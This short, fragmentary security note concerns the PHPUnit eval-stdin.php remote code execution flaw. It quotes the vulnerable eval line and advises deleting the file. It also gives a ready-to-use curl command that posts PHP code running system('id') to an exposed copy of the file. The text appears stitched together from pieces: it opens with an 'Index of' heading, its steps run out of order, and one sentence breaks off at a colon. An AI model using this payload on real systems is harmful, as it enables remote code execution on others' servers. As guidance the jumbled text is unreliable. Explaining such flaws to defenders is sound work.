Index of vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

If eval-stdin.php is accessible via HTTP, an attacker does not need to navigate to the page in a browser. They use a command-line tool like cURL to send malicious code.

Delete the file and move PHPUnit out of the web root.

curl -d "<?php system('id'); ?>" https://yoursite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

When PHPUnit needs to run a test method in a separate PHP process:

The vulnerability stemmed from one dangerous line of code: eval('?> ' . file_get_contents('php://input'));